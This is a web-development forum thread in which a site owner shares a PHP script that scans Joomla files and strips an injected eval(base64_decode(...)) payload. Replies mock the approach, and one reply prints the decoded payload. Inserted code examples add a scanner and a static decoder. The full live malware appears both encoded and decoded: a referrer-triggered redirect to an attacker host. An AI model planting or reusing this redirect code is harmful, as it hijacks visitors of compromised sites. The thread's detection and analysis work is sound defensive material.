RandyPetersen Posted October 27, 2012

I found this PHP script that checks the site and removes base64_decode based hacks. I had/have some problems with these hacks as of late. My hosting provider is working to remedy this, but this script worked awesome. The first time, about a week ago (I didn't have this script), I had to download all my files, run a script here to clean the files and re-upload them. It took forever, but this script made quick work of it when I was infected with a different code the second time. I was just thinking about tweaking it a bit to help me find the next attack and for anyone else in the future. I am not a PHP coder, but have modified it a bit for my use. It was detecting some files that I had that were empty and reporting that it couldn't check the files. I put the filesize>0 conditional statement in there to remedy that. This is newbie stuff I am sure, so maybe someone would like to help out and make something useful.

List of improvements would be:
* Exclude the file in which this script is contained.
* Set up an array or a separate file of known base64_decode redirect code.
* On files which contain a "base64_decode" command but none of the known exploits, display the next few lines of the file after the base64_decode command to see if a new exploit is being introduced.

<html><head><title>Find String</title></head><body>
<div style="width:500px; margin:20px; padding:20px; background:#ccc; border:#2d2d2d 1px solid;">
<p>
This is currently locating the infected string <br />
All strings that match will be removed automatically for you. <br />
Credit : http://www.tahapaksu.com
</p>
<p>
Refresh the page after the script is done, <br />
There might be some files left, but those are not <br />
infected by this particular decode causing redirect to <br />
costabrava.bee.pl
</p>
<p>Above edit by criticalpixel.com </p>
</div>
<?php
// Uncomment on hosts whose default execution time limit is too short for the whole tree:
// ini_set('max_execution_time', '0');
// set_time_limit(0);

find_files('.');

// Walk the directory tree below $seed (iteratively, with a stack of directories)
// and hand every .php/.phpN/.js/.txt file to check_files().
function find_files($seed)
{
    if (!is_dir($seed)) {
        return false;
    }
    $dirs = array($seed);
    while (null !== ($dir = array_pop($dirs))) {
        if ($dh = opendir($dir)) {
            while (false !== ($file = readdir($dh))) {
                if ($file == '.' || $file == '..') {
                    continue;
                }
                $path = $dir . '/' . $file;
                if (is_dir($path)) {
                    $dirs[] = $path;
                } elseif (preg_match('/\.(php\d?|js|txt)$/i', $path)) {
                    check_files($path);
                }
            }
            closedir($dh);
        }
    }
}

// Report every file containing the search string and strip the one known payload from it.
function check_files($this_file)
{
    $str_to_find = 'base64_decode("'; // the string (code/text) to search for

    $content = file_get_contents($this_file);
    if ($content === false || $content === '') {
        // An empty file (filesize 0) is skipped silently; a file that could not be
        // read is reported. Comparing with === avoids treating a file whose whole
        // content is "0" as unreadable.
        if ($content === false || filesize($this_file) > 0) {
            echo "<p>Could not check $this_file</p>\n";
        }
        return;
    }

    if (stristr($content, $str_to_find)) {
        echo "<p>$this_file -> contains $str_to_find</p>\n";
        // The exact injected line seen on this site; only a verbatim match is removed,
        // so a different payload is reported but left in place.
        $str_to_replace = 'eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmICghc3RyaXN0cigkdWFnLCJNU0lFIDcuMCIpIGFuZCAhc3RyaXN0cigkdWFnLCJNU0lFIDYuMCIpKXsKaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInJhbWJsZXIiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb2dvIikgb3Igc3RyaXN0cigkcmVmZXJlciwibGl2ZS5jb20iKW9yIHN0cmlzdHIoJHJlZmVyZXIsImFwb3J0Iikgb3Igc3RyaXN0cigkcmVmZXJlciwibmlnbWEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ3ZWJhbHRhIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmVndW4ucnUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJzdHVtYmxldXBvbi5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQubHkiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9yIHByZWdfbWF0Y2goIi95YW5kZXhcLnJ1XC95YW5kc2VhcmNoXD8oLio/KVwmbHJcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgiL2dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vbHBpc3R3LjRwdS5jb20vIik7DQpleGl0KCk7DQp9Cn0KfQ0KfQ0KfQ=="));';
        $content = str_replace($str_to_replace, "", $content);
        file_put_contents($this_file, $content);
    }
    unset($content);
}
?>
</body></html>

What are your thoughts? Is it worth it? What would be a command to find the filename of the current file running the script? Set up a file with several lines or just set up an array? Show just a few lines of a file?

Thanks, Randy
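An added example, not Randy's script and not the tahapaksu.com/criticalpixel.com original: a command-line PHP scanner that does the three things in the improvements list. It finds the running script's own path with realpath(__FILE__) and skips it, keeps known payloads in an array, and prints the lines following every base64_decode( that the array does not account for. Nothing is written back unless --fix is given. The --fix flag, the empty $known_payloads array, the extension list and the five context lines are this example's own assumptions; run it from a shell as php scan.php /path/to/docroot.

```php
<?php
// Added example: report-only scanner implementing the three improvements from the post.
// Not the script from the post. Usage: php scan.php /path/to/docroot [--fix]

$root    = isset($argv[1]) && $argv[1] !== '--fix' ? $argv[1] : '.';
$fix     = isset($argv) && in_array('--fix', $argv, true);  // assumption: default is report-only
$context = 5;                          // assumption: lines shown after an unknown hit
$self    = realpath(__FILE__);         // improvement 1: the running script's own path

// Improvement 2: known injected strings, matched verbatim and (with --fix) removed.
// Paste the full eval(base64_decode("...")); literal; a prefix only recognises a family.
$known_payloads = array(
    // 'eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7...=="));',
);

// What counts as worth a look: base64_decode( with either quote style.
$suspicious = '/base64_decode\s*\(\s*[\'"]/i';
$wanted     = '/\.(php\d?|phtml|js|txt|html?)$/i';

function scan_tree($root, $self, $known_payloads, $suspicious, $wanted, $context, $fix)
{
    $report = array('unreadable' => array(), 'known' => array(), 'unknown' => array());
    $files  = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($files as $file) {
        $path = $file->getPathname();
        if (!preg_match($wanted, $path) || realpath($path) === $self) {
            continue;                                  // wrong file type, or this script itself
        }
        $content = @file_get_contents($path);
        if ($content === false) { $report['unreadable'][] = $path; continue; }
        if ($content === '')    { continue; }          // empty file, nothing to check

        // Strip every known payload from the in-memory copy; write back only with --fix.
        $clean = str_replace($known_payloads, '', $content);
        if ($clean !== $content) {
            $report['known'][] = $path;
            if ($fix) { file_put_contents($path, $clean); }
        }

        // Improvement 3: whatever still calls base64_decode() is shown with context lines.
        $lines = preg_split('/\r\n|\r|\n/', $clean);
        foreach ($lines as $i => $line) {
            if (preg_match($suspicious, $line)) {
                $report['unknown'][$path][$i + 1] = array_slice($lines, $i, $context + 1, true);
            }
        }
    }
    return $report;
}

function print_report($report)
{
    foreach ($report['unreadable'] as $p) { echo "UNREADABLE $p\n"; }
    foreach ($report['known'] as $p)      { echo "KNOWN      $p\n"; }
    foreach ($report['unknown'] as $p => $hits) {
        foreach ($hits as $lineno => $snippet) {
            echo "UNKNOWN    $p:$lineno\n";
            foreach ($snippet as $n => $text) {
                // base64 blobs run to kilobytes; truncate so the report stays readable
                if (strlen($text) > 120) { $text = substr($text, 0, 117) . '...'; }
                printf("  %5d | %s\n", $n + 1, $text);
            }
        }
    }
}

print_report(scan_tree($root, $self, $known_payloads, $suspicious, $wanted, $context, $fix));
```

Two caveats a practitioner would attach. The match is a literal string, so it only sees payloads that spell base64_decode( out in the source; injected code that assembles the function name from pieces, uses hex escapes, or wraps the payload in gzinflate()/str_rot13() without a visible base64_decode( is not reported, and an empty report means "nothing matching this signature", not "clean". And removing a matched string fixes the symptom only: if the scanner keeps finding new hits after a --fix run, the entry point that wrote them is still open.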
ignace Posted October 28, 2012

ROFLMAO. This made me laugh really hard. So there is a script that modifies your files, and to remedy this you run another script to clean them? Never thought that maybe you should solve the problem at the root? How are they modifying your files? Through FTP? Then change your password. Are they on the same shared hosting server? Leave, and find a better hosting company that actually knows what they are doing.

Edited October 28, 2012 by ignace
RandyPetersen Posted October 28, 2012

Ya, I see the humor in that. Of course the root of the problem is being figured out and resolved. This is just a stop-gap until it's resolved. Search for base64_decode hacks and you'll see it's a common problem. All FTPs were changed after the first attack, and I was attacked again. I think it may be one of the 20 websites that I have under the account. Either they installed a bad component or they hacked a password. Either way, this will allow me some time as I try to resolve the problem. I am also planning on upgrading them to the latest version of Joomla and the components they use, but that will take time; this script has been a lifesaver.
MDCode Posted October 28, 2012

Why would you need 20 websites...
Jessica Posted October 28, 2012

Why WOULDN'T you need 20 websites?
ignace Posted October 31, 2012

> All FTPs were changed after the first attack, and I was attacked again.

Are you sure it is done through FTP? It is possible the problem is the software: Joomla. Which plugins have you installed? Have you checked the open issues with both? Or which issues there are with your currently installed versions?

> I think it may be one of the 20 websites that I have under the account. Either they installed a bad component or they hacked a password.

So, you have no clue.
haku Posted October 31, 2012

This is where a versioning system like Git, SVN or CVS can help. If you get a bug, you wipe your entire file system clean and re-checkout the repository. Takes no more than a few seconds.
Monkuar Posted October 31, 2012

LMFAO so you get injected with hacks, probably from MySQL injections, or your host is tampering with your data files... and to fix this you build a script to clean them manually? LMFAO I saved this topic as the best topic of the decade by far. Are you on a shared hosting account / VPS / dedi / what?? Remedy the problem at the CORE level, no need for you to waste time doing this. Also if you're on a VPS set up a cron if you wish.. lol

Why in the world are you replacing your values with:

error_reporting(0);
$qazplm = headers_sent();
if (!$qazplm) {
    $referer = $_SERVER['HTTP_REFERER'];
    $uag     = $_SERVER['HTTP_USER_AGENT'];
    if ($uag) {
        // skip old Internet Explorer, and only fire when the visitor arrived from a search engine or social site
        if (!stristr($uag, "MSIE 7.0") and !stristr($uag, "MSIE 6.0")) {
            if (stristr($referer, "yahoo") or stristr($referer, "bing") or stristr($referer, "rambler")
                or stristr($referer, "gogo") or stristr($referer, "live.com") or stristr($referer, "aport")
                or stristr($referer, "nigma") or stristr($referer, "webalta") or stristr($referer, "begun.ru")
                or stristr($referer, "stumbleupon.com") or stristr($referer, "bit.ly") or stristr($referer, "tinyurl.com")
                or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/", $referer)
                or preg_match("/google\.(.*?)\/url\?sa/", $referer)
                or stristr($referer, "myspace.com") or stristr($referer, "facebook.com") or stristr($referer, "aol.com")) {
                // not when the referer looks like a cached copy or a site: search
                if (!stristr($referer, "cache") or !stristr($referer, "inurl")) {
                    header("Location: http://lpistw.4pu.com/");
                    exit();
                }
            }
        }
    }
}

lmfao myspace really?

Edited October 31, 2012 by Monkuar
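Monkuar's decoded payload above was recovered by hand. As an added example, not code from this thread, the PHP below recovers the same kind of plaintext without ever executing it: it peels nested eval(base64_decode(...)), gzinflate(), gzuncompress() and str_rot13() layers from a piece of source, then pulls the header("Location: ...") targets and the stristr() referrer keywords out of the innermost layer. The sample input is constructed inline and modelled on this thread's payload but much shorter; the supported decoder list and the depth limit are this example's own choices.

```php
<?php
// Added example: statically unwrap eval(base64_decode(...))-style payloads and list
// what they do, without running them. Not code from this thread.

// Peel up to $max_depth nested eval(<decoders>("literal")) layers. Returns the
// plaintext of each layer, innermost last. The decoder list is an assumption of
// this example; extend it as you meet other wrappers.
function peel_layers($source, $max_depth = 5)
{
    $layers = array();
    $chain  = '/eval\s*\(((?:\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\()+)\s*[\'"]([^\'"]+)[\'"]/i';
    for ($depth = 0; $depth < $max_depth; $depth++) {
        if (!preg_match($chain, $source, $m)) {
            break;                       // no further eval(...) layer in this text
        }
        preg_match_all('/base64_decode|gzinflate|gzuncompress|str_rot13/i', $m[1], $fns);
        $data = $m[2];
        // The innermost call runs first, so apply the chain in reverse order.
        foreach (array_reverse($fns[0]) as $fn) {
            $fn   = strtolower($fn);
            $data = ($fn === 'base64_decode') ? base64_decode($data, true) : @call_user_func($fn, $data);
            if ($data === false) {
                return $layers;          // corrupt or truncated layer: stop here
            }
        }
        $layers[] = $data;
        $source   = $data;
    }
    return $layers;
}

// Pull the observable behaviour out of a decoded layer: where it redirects to and
// which referrer strings trigger it.
function indicators($plain)
{
    preg_match_all('/header\s*\(\s*[\'"]Location:\s*([^\'"]+)[\'"]/i', $plain, $loc);
    preg_match_all('/stristr\s*\(\s*\$\w+\s*,\s*[\'"]([^\'"]+)[\'"]\s*\)/i', $plain, $ref);
    return array('redirects' => $loc[1], 'referrer_keywords' => $ref[1]);
}

// Constructed sample input (not the thread's literal, which is far longer): a
// referrer-conditional redirect wrapped in two layers, base64 over gzinflate over base64.
$inner  = 'error_reporting(0); if (!headers_sent()) { $r = $_SERVER["HTTP_REFERER"]; '
        . 'if (stristr($r, "google") or stristr($r, "bing")) { '
        . 'header("Location: http://redirect.example/"); exit(); } }';
$layer1 = 'eval(gzinflate(base64_decode("' . base64_encode(gzdeflate($inner)) . '")));';
$sample = "<?php\n// legitimate code above\n"
        . 'eval(base64_decode("' . base64_encode($layer1) . '"));' . "\n";

$layers = peel_layers($sample);
foreach ($layers as $i => $plain) {
    printf("--- layer %d (%d bytes) ---\n%s\n", $i + 1, strlen($plain), $plain);
}
if ($layers) {
    $ind = indicators(end($layers));
    echo "redirects to:      " . implode(', ', $ind['redirects']) . "\n";
    echo "referrer triggers: " . implode(', ', $ind['referrer_keywords']) . "\n";
}
```

To use it on a real file, replace $sample with file_get_contents() of the infected file. The decoding is done with PHP's own library functions, never with eval(), so the payload's redirect, exit() and error_reporting(0) have no effect on the machine doing the analysis. The strict flag on base64_decode() makes a truncated or tampered layer return false instead of garbage, which is why the loop stops there rather than feeding nonsense to gzinflate().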